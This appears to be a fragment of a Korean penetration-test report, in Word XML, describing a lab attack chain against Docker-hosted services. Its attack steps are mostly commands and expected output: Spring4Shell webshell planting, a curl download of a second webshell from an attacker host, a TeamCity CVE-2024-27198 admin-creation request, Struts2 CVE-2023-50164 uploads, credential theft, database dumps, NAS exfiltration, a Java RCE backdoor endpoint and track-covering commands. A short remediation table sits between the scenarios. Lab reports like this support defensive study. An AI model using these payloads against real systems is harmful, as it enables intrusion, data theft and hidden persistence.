Tomcat 로그 플러시 (웹쉘 디스크 기록)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>AccessLogValve의 로그 버퍼를 강제로 비워 조작된 로그 내용(웹쉘 코드)이 webapps/ROOT/yaho4.jsp 파일로 디스크에 기록되도록 유도한다. 이를 위해 대상 엔드포인트에 추가적인 HTTP GET 요청을 전송하여 Tomcat의 로그 플러시를 트리거한다.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="707070"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>▶ 로그 플러시 트리거 명령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Tomcat 로그 플러시 트리거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http://localhost:8011/spring-form/login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2초 대기 후 yaho4.jsp 생성 확인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time.sleep(2)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STEP 3. Stage1 웹쉘 확인 (yaho4.jsp)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>생성된 Stage1 웹쉘(yaho4.jsp)에 cmd=whoami 파라미터를 전달하여 RCE 성공 여부를 확인한다. 최대 5회 재시도하며, 실패 시 페이로드 재전송 및 플러시를 반복한다. 성공 시 서버 실행 사용자 계정 정보가 반환된다.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="707070"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>▶ Stage1 웹쉘 검증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Stage1 웹쉘 동작 확인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http://localhost:8011/yaho4.jsp?cmd=whoami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예상 응답 (최대 5회 시도)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[1/5] yaho4.jsp?cmd=whoami → root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[OK] Stage1 shell confirmed! User: root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STEP 4. Stage2 웹쉘 배포 (health_check.jsp)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Stage1 웹쉘을 발판 삼아 완성형 Stage2 웹쉘(health_check.jsp)을 배포한다. 배포 방법은 두 가지이다. Method A는 공격자 PC에서 로컬 HTTP 서버(포트 9090)를 열고, Stage1 웹쉘을 통해 curl 명령으로 health_check.jsp를 다운로드하는 방식이다. Method B는 docker cp 명령을 이용해 컨테이너 내부에 직접 복사하는 폴백(Fallback) 방식이다.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="707070"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>▶ Stage2 웹쉘 배포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[Method A] curl 방식 — Stage1 웹쉘을 통한 원격 다운로드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http://localhost:8011/yaho4.jsp?cmd=curl%20http://host.docker.internal:9090/health_check.jsp%20-o%20/usr/local/tomcat/webapps/ROOT/health_check.jsp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[Method B] docker cp 방식 — 폴백(Fallback)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docker cp ./02.AttackScripts/health_check.jsp 01testserver-spring-1:/usr/local/tomcat/webapps/ROOT/health_check.jsp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STEP 5. Stage2 웹쉘 검증 (RCE 거점 확보)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>health_check.jsp에 비밀번호(pwd=glory)와 실행 명령(cmd=id)을 전달하여 완성형 웹쉘의 동작을 확인한다. uid=0(root) 또는 uid= 포함 응답이 확인되면 서버에 대한 완전한 RCE 거점을 확보한 것으로 판정한다.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="707070"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>▶ Stage2 웹쉘 검증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Stage2 웹쉘 검증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http://localhost:8011/health_check.jsp?pwd=glory&amp;cmd=id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예상 응답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uid=0(root) gid=0(root) groups=0(root)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[OK] Stage2 shell working! 거점 확보 완료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STEP 6. 내부 정보 수집 — DB 크리덴셜 탈취</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>RCE 권한을 이용하여 Spring 서버 내 DB 클라이언트(mysql, psql, sqlite3) 설치 여부를 확인하고, application.properties 설정 파일에서 DB 접속 정보(URL, 사용자명, 비밀번호)를 추출한다. 설정 파일 경로는 find 명령으로 탐색하거나 기본 경로를 사용한다.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="707070"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>▶ DB 크리덴셜 탈취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DB 클라이언트 탐색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http://localhost:8011/health_check.jsp?pwd=glory&amp;cmd=which%20mysql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Spring 설정 파일 탐색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http://localhost:8011/health_check.jsp?pwd=glory&amp;cmd=find%20/usr/local/tomcat/webapps%20-name%20application.properties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설정 파일 내용 추출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http://localhost:8011/health_check.jsp?pwd=glory&amp;cmd=cat%20/usr/local/tomcat/webapps/spring-form/WEB-INF/classes/application.properties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응답 예시 (탈취된 크리덴셜)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spring.datasource.url=jdbc:mysql://spring-db:3306/spring_db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spring.datasource.username=spring_user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spring.datasource.password=spring_pass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STEP 7. 내부 DB 무단 접근 (고객 정보 탈취)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>STEP 6에서 탈취한 DB 크리덴셜을 이용하여 내부 DB에 접근한다. mysql 클라이언트가 존재하면 RCE를 통해 직접 mysql 명령을 실행하고, 없는 경우 JDBC를 사용하는 커스텀 JSP 페이로드(db_dump.jsp)를 서버에 업로드하여 DB 쿼리를 실행한다.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="707070"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>▶ 내부 DB 접근 (db_dump.jsp)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[Method A] mysql 클라이언트 직접 실행 (RCE)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mysql -h spring-db -u spring_user -pspring_pass -e 'SHOW DATABASES; SELECT version();'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[Method B] JSP JDBC 페이로드 방식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1. base64로 인코딩된 db_dump.jsp를 서버에 업로드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echo &lt;base64_payload&gt; | base64 -d &gt; /usr/local/tomcat/webapps/spring-form/db_dump.jsp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2. JSP 페이로드로 DB 쿼리 실행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http://localhost:8011/spring-form/db_dump.jsp?u=jdbc:mysql://spring-db:3306/spring_db&amp;n=spring_user&amp;p=spring_pass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응답 예시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[Table: users]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id=1 | name=admin | email=admin@sl.com | ...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STEP 8. 횡적 이동 — TeamCity → Struts2 (직원 DB 탈취)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Stage2 웹쉘 거점을 기반으로 내부망 횡적 이동을 수행한다. 먼저 Spring 서버에 HTTP Proxy Shell(proxy.jsp)을 업로드하여 내부망 서버 간 통신 브릿지로 활용한다. 이후 CVE-2024-27198(TeamCity 인증 우회)로 관리자 계정을 생성하고, CVE-2023-50164(Struts2 파일 업로드)로 직원 DB에 접근하는 JSP 페이로드를 배포한다.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="707070"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>▶ 횡적 이동 (proxy.jsp → TeamCity → Struts2)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1. Spring 서버에 Proxy Shell 업로드 (내부망 통신 브릿지)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echo &lt;base64_proxy_jsp&gt; | base64 -d &gt; /usr/local/tomcat/webapps/ROOT/proxy.jsp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2. TeamCity CVE-2024-27198 — 관리자 계정 강제 생성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POST http://teamcity-server:8111/hax?jsp=/app/rest/users;.jsp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Body: {"username":"hacker","password":"Hacker123!","roles":{"role":[{"roleId":"SYSTEM_ADMIN","scope":"g"}]}}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3. Struts2 CVE-2023-50164 — DB 탈취 JSP 배포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POST http://struts:8080/upload/employee-upload.action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multipart: Upload=strutsdb.jsp (JDBC payload), uploadFileName=strutsdb.jsp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4. Struts DB 쿼리 실행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http://struts:8080/upload/uploads/faces/strutsdb.jsp;x?pwd=j&amp;query=SELECT+*+FROM+employees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응답 예시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id | name | department | salary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---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1 | Kim Chulsu | R&amp;D | 55000000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STEP 9. NAS SMB 데이터 탈취</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>JCIFS-NG Java 라이브러리를 Maven 저장소에서 동적으로 다운로드하여 Spring 서버 /tmp 디렉터리에 저장한다. 이후 NAS 전용 웹쉘(nasshell.jsp)을 서버에 업로드하여 JCIFS-NG를 통해 내부망 NAS(smb://nas/data/)에 SMB 인증으로 접속하고, 기밀 파일 목록을 탈취한다.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="707070"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>▶ NAS SMB 접속 (nasshell.jsp + JCIFS-NG)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1. JCIFS-NG 라이브러리 동적 다운로드 (downloader.jsp 통해)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Maven: jcifs-ng-2.1.9.jar, slf4j-api-1.7.36.jar 등 /tmp에 저장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2. NAS Shell 업로드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echo &lt;base64_nas_jsp&gt; | base64 -d &gt; /usr/local/tomcat/webapps/ROOT/nasshell.jsp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3. NAS SMB 접속 및 파일 목록 탈취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http://localhost:8011/nasshell.jsp?pwd=glory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예상 응답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[FILE] Product_Architecture_v2.pdf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[FILE] TeamCity_API_Token.txt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[FILE] Employee_Salaries_2023.xlsx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[DIR]  Confidential_Designs/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3"/>
        </w:rPr>
        <w:t>5-n. 대응 방안 (시나리오 1)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929"/>
        <w:gridCol w:w="2929"/>
        <w:gridCol w:w="2929"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
            <w:shd w:fill="2E74B5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>취약점/항목</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1020"/>
            <w:shd w:fill="2E74B5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>위험도</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5783"/>
            <w:shd w:fill="2E74B5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>대응 방안</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
            <w:shd w:fill="F9F9F9" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Spring4Shell</w:t>
              <w:br/>
              <w:t>(CVE-2022-22965)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1020"/>
            <w:shd w:fill="F9F9F9" w:val="clear"/>
            <w:shd w:fill="FFF3CD" w:val="clear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5783"/>
            <w:shd w:fill="F9F9F9" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>• Spring Framework 5.3.18 이상 또는 5.2.20 이상으로 즉시 업그레이드</w:t>
              <w:br/>
              <w:t>• 불가 시 application.properties에서 DataBinder setDisallowedFields 적용</w:t>
              <w:br/>
              <w:t>• WAF(웹 애플리케이션 방화벽)에서 class.module.classLoader 포함 요청 차단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Tomcat AccessLogValve</w:t>
              <w:br/>
              <w:t>설정 강화</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1020"/>
            <w:shd w:fill="EBF3FB" w:val="clear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• logging.access-log=false 설정으로 불필요한 접근 로그 비활성화</w:t>
              <w:br/>
              <w:t>• Tomcat 관리 인터페이스(webapps/ROOT)에 외부 접근 차단</w:t>
              <w:br/>
              <w:t>• 의심스러운 HTTP 파라미터 패턴에 대한 IDS 탐지 룰 적용</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
            <w:shd w:fill="F9F9F9" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>TeamCity</w:t>
              <w:br/>
              <w:t>(CVE-2024-27198)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1020"/>
            <w:shd w:fill="F9F9F9" w:val="clear"/>
            <w:shd w:fill="FDECEA" w:val="clear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5783"/>
            <w:shd w:fill="F9F9F9" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>• TeamCity 2023.11.4 이상으로 즉시 업그레이드</w:t>
              <w:br/>
              <w:t>• 내부망 CI/CD 서버에 대한 외부/비인가 접근 방화벽 ACL 적용</w:t>
              <w:br/>
              <w:t>• 관리자 계정 변경 이벤트에 대한 SIEM 알럿 설정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Struts2 파일 업로드</w:t>
              <w:br/>
              <w:t>(CVE-2023-50164)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1020"/>
            <w:shd w:fill="FDECEA" w:val="clear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• Apache Struts 2.5.33 또는 6.3.0.2 이상으로 업그레이드</w:t>
              <w:br/>
              <w:t>• 업로드 디렉터리에 JSP 실행 권한 제거 (webapps 외부로 업로드 경로 이동)</w:t>
              <w:br/>
              <w:t>• 파일 업로드 확장자 화이트리스트 검증 강화</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
            <w:shd w:fill="F9F9F9" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>NAS 접근 통제</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1020"/>
            <w:shd w:fill="F9F9F9" w:val="clear"/>
            <w:shd w:fill="FFF3CD" w:val="clear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5783"/>
            <w:shd w:fill="F9F9F9" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>• SMB 익명 접근 차단, 계정별 최소 권한 원칙 적용</w:t>
              <w:br/>
              <w:t>• NAS 접근 로그 모니터링 및 비업무 시간 접근 알럿 설정</w:t>
              <w:br/>
              <w:t>• 중요 파일에 DLP(데이터 유출 방지) 정책 적용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497D"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>6. 시나리오 2: 내부자 위협 시뮬레이션 (sub_run.py)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="2E74B5"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>본 시나리오는 정상적인 업무 접근 권한을 보유한 내부 직원(불만 직원 또는 악의적 행위자)이 별도의 외부 취약점 없이 기업 핵심 자산을 탈취하고 CI/CD 파이프라인에 백도어를 심는 과정을 재현한다. 이미 Spring4Shell을 통해 거점 웹쉘(health_check.jsp)이 확보된 상황을 전제로 한다.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>6-1. 테스트 환경 정보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94"/>
        <w:gridCol w:w="4394"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
            <w:shd w:fill="2E74B5" w:val="clear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520"/>
            <w:shd w:fill="2E74B5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>정보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b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>내부자 역할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sz w:val="19"/>
              </w:rPr>
              <w:t>Spring4Shell 거점 웹쉘 보유 내부 개발자 (정상 업무 권한 보유)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거점 웹쉘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http://localhost:8011/health_check.jsp (pwd=glory)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b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>NAS 서버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sz w:val="19"/>
              </w:rPr>
              <w:t>nas:445/SMB — 설계 도면, CI/CD 토큰 저장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소스코드 저장소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gitea:3000 — Spring 서버 레포지토리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b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>CI/CD 서버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sz w:val="19"/>
              </w:rPr>
              <w:t>teamcity-server:8111 — 빌드 및 자동 배포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내부 DB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spring-db:3306 (고객), struts-db:3306 (직원)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b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>실행 스크립트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sz w:val="19"/>
              </w:rPr>
              <w:t>python3 sub_run.py  (02.AttackScripts/ 하위 모듈 포함)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3"/>
        </w:rPr>
        <w:t>6-2. 시나리오 재현</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="17385E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Phase 1. 정찰 (Reconnaissance)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>내부자는 확보한 거점 웹쉘을 통해 현재 서버 환경과 내부망 구조를 파악한다. 시스템 정보(id, hostname, uname)를 수집하고, 내부 서비스(VNC, Gitea, TeamCity)의 포트 개방 여부를 확인하여 공격 방향을 설정한다.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="707070"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>▶ 내부 환경 정찰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시스템 정보 수집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/health_check.jsp?pwd=glory&amp;cmd=id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→ uid=0(root) gid=0(root) groups=0(root)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/health_check.jsp?pwd=glory&amp;cmd=hostname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→ 01testserver-spring-1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/health_check.jsp?pwd=glory&amp;cmd=uname+-a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→ Linux ... x86_64 GNU/Linux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내부 서비스 포트 스캔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/health_check.jsp?pwd=glory&amp;cmd=bash+-c+'echo+&gt;/dev/tcp/employee-desktop/6901+&amp;&amp;+echo+OPEN'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/health_check.jsp?pwd=glory&amp;cmd=bash+-c+'echo+&gt;/dev/tcp/gitea/3000+&amp;&amp;+echo+OPEN'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/health_check.jsp?pwd=glory&amp;cmd=bash+-c+'echo+&gt;/dev/tcp/teamcity-server/8111+&amp;&amp;+echo+OPEN'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Phase 2. NAS 기밀 탈취 (Data Exfiltration)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>내부자는 SMB 프로토콜을 통해 마운트된 NAS 서버(/mnt/nas)에 접근하거나, 포트 445가 열려 있는 것을 확인하고 SMB 클라이언트로 직접 연결한다. NAS에는 제품 설계 도면(PDF), TeamCity API 토큰, 직원 급여 파일 등 핵심 기밀이 저장되어 있다.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="707070"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>▶ NAS 기밀 파일 탈취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NAS SMB 포트 확인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/health_check.jsp?pwd=glory&amp;cmd=bash+-c+'echo+&gt;/dev/tcp/nas/445+&amp;&amp;+echo+NAS_OPEN'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→ NAS_OPEN (nas:445 포트 접근 가능)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NAS 마운트 파일 목록 확인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/health_check.jsp?pwd=glory&amp;cmd=ls+/mnt/nas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SMB 클라이언트 직접 접근 (업무 권한)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smbclient //nas/data -U smbuser%smbpass -c 'ls'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탈취 대상 파일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[FILE] Product_Architecture_v2.pdf   ← 제품 설계 도면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[FILE] TeamCity_API_Token.txt        ← CI/CD 인증 토큰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[FILE] Employee_Salaries_2023.xlsx   ← 직원 급여 정보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Phase 3. 크리덴셜 수집 (Credential Harvesting)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Spring 서버의 application.properties 설정 파일에서 하드코딩된 DB 접속 정보를 추출한다. 또한 서버 환경변수(env)에서 DB 관련 민감 정보를 필터링하여 수집한다. 이는 개발 편의를 위해 소스코드/설정 파일에 크리덴셜을 직접 기재하는 관행에서 비롯된 취약점이다.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="707070"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>▶ 하드코딩 크리덴셜 추출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application.properties 파일 탈취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/health_check.jsp?pwd=glory&amp;cmd=cat+/usr/local/tomcat/webapps/spring-form/WEB-INF/classes/application.properties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응답 (하드코딩된 DB 크리덴셜 노출)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spring.datasource.url=jdbc:mysql://spring-db:3306/spring_db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spring.datasource.username=spring_user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spring.datasource.password=spring_pass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서버 환경변수에서 민감 정보 필터링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/health_check.jsp?pwd=glory&amp;cmd=env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→ DB_HOST=spring-db  DB_USER=spring_user  DB_PASS=spring_pass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설정 파일 위치 탐색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/health_check.jsp?pwd=glory&amp;cmd=find+/usr/local/tomcat+-name+application.properties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Phase 4. 내부 DB 접근 (Lateral Movement)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Phase 3에서 획득한 크리덴셜을 재사용하여 내부망 MySQL DB 서버에 직접 접속한다. 방화벽 없이 컨테이너 네트워크로 연결된 spring-db(고객 정보)와 struts-db(직원 정보)에 접근하여 전체 데이터를 덤프한다.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="707070"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>▶ 내부 DB 무단 접근 및 데이터 덤프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내부 DB 포트 접근 확인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/health_check.jsp?pwd=glory&amp;cmd=bash+-c+'echo+&gt;/dev/tcp/spring-db/3306+&amp;&amp;+echo+DB_OPEN'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→ DB_OPEN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/health_check.jsp?pwd=glory&amp;cmd=bash+-c+'echo+&gt;/dev/tcp/struts-db/3306+&amp;&amp;+echo+DB_OPEN'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→ DB_OPEN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직접 MySQL 접속 (고객 정보 덤프)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mysql -h spring-db -u spring_user -pspring_pass spring_db -e 'SELECT * FROM users LIMIT 10;'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전체 DB 덤프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mysqldump -h spring-db -u spring_user -pspring_pass spring_db &gt; /tmp/spring_dump.sql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mysqldump -h struts-db -u struts_user -pstruts_pass struts_db &gt; /tmp/struts_dump.sql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Phase 5. 공급망 공격 (Supply Chain Attack)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Phase 2에서 탈취한 TeamCity API 토큰을 이용해 CI/CD 파이프라인에 접근한다. 내부자는 Gitea 저장소에서 소스코드를 clone하고 악성 코드(숨겨진 원격 실행 엔드포인트)를 삽입한 뒤 push한다. TeamCity가 변경된 코드를 감지하면 자동 빌드 및 배포가 수행되어 프로덕션 서버에 백도어가 설치된다.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="707070"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>▶ CI/CD 공급망 공격 흐름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TeamCity 서버 접근 가능 여부 확인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/health_check.jsp?pwd=glory&amp;cmd=bash+-c+'echo+&gt;/dev/tcp/teamcity-server/8111+&amp;&amp;+echo+TC_ALIVE'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→ TC_ALIVE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Gitea 저장소 접근 확인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GET /health_check.jsp?pwd=glory&amp;cmd=bash+-c+'echo+&gt;/dev/tcp/gitea/3000+&amp;&amp;+echo+GITEA_ALIVE'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→ GITEA_ALIVE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공급망 공격 흐름 (시뮬레이션)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1. Gitea에서 spring-server 레포지토리 clone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2. ApplicationController.java에 숨겨진 RCE 엔드포인트 삽입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3. 정상 기능 commit 메시지로 위장 후 push: git push origin main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4. TeamCity 자동 빌드 &amp; 프로덕션 배포 트리거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5. 배포 완료 후 /app/health?x=&lt;cmd&gt; 형태로 백도어 접근 가능</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="17385E"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Phase 6. 백도어 삽입 및 흔적 은폐 (Persistence &amp; Cover Tracks)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>프로덕션 서버에 백도어를 심고, 증거를 은폐한다. git log를 수정하여 악의적인 커밋 내역을 삭제하고, bash_history 파일을 비워 서버에서 실행한 명령어 이력을 제거한다. 이로써 공격자는 장기간 탐지 없이 백도어를 유지할 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="707070"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>▶ 백도어 코드 및 흔적 은폐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백도어 삽입 예시 (Spring Controller 내 숨겨진 엔드포인트)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@GetMapping("/app/health")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public ResponseEntity&lt;String&gt; health(@RequestParam(required=false) String x) throws Exception {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if (x != null) {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Process p = Runtime.getRuntime().exec(new String[]{"/bin/sh","-c",x});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 return ResponseEntity.ok(new String(p.getInputStream().readAllBytes()));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}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return ResponseEntity.ok("OK");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}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# 흔적 은폐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git log --oneline -5                   # 수상한 커밋 확인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git rebase -i HEAD~3                   # 악의적 커밋 숨김/삭제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history -c &amp;&amp; &gt; ~/.bash_history        # 명령어 이력 삭제</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8787"/>
